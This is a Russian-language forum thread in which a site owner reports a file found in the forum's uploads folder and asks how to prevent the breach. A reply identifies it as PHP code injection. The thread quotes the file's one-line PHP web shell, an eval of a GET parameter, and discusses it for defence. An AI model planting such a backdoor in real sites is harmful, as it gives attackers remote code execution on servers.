Перейти к контенту
  • 0

фзлом форума - eval(stripslashes


ART[FL]

Вопрос

Здравствуйте

сегодня получил от хостера письмо с сылкой на подозрительный файл на площадке

ссылка на сайт/www/forums/uploads/1.php

 

в котором был ниже приведённый код

 

<?eval(stripslashes($_GET[a]));?>

 

как предотвратить появление сего взлома в будущем? что этим смог добиться взломщик, ведь всё на форуме работает

Как залатать дыру?

 

в админке пишет версия форума 2.3.5, хотя помню что устанавливал последний патч 2.3.6, но он неотображается в панели

Ссылка на комментарий
Поделиться на других сайтах

Рекомендуемые сообщения

  • 0

как предотвратить появление сего взлома в будущем?

 

Узнать каким образом посторонний код попал на форум, и закрыть уязвимость. Учитывая то, что вторая линейка давно не поддерживается, вам предстоит увлекательное занятие.

 

что этим смог добиться взломщик

 

Php code injection, со всеми вытекающими

 

ведь всё на форуме работает

 

А с чего на форуме что-то не должно работать? Во первых, сам этот код напрямую с форумом не связан, а во вторых цель взломщика наоборот остаться как можно незаметнее в системе, и "неработоспособность" у него входит в последнюю очередь.

 

но он неотображается в панели

 

В какой панели, и что там должно отображаться?

Ссылка на комментарий
Поделиться на других сайтах

Присоединиться к обсуждению

Вы можете ответить сейчас, а зарегистрироваться позже. Если у вас уже есть аккаунт, войдите, чтобы ответить от своего имени.

Гость
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Ответить на вопрос...

×   Вы вставили отформатированный текст.   Удалить форматирование

  Допустимо не более 75 смайлов.

×   Ваша ссылка была автоматически заменена на медиа-контент.   Отображать как ссылку

×   Ваши публикации восстановлены.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

Зарузка...
×
×
  • Создать...

Важная информация

Находясь на нашем сайте, вы соглашаетесь на использование файлов cookie, а также с нашим положением о конфиденциальности Политика конфиденциальности и пользовательским соглашением Условия использования.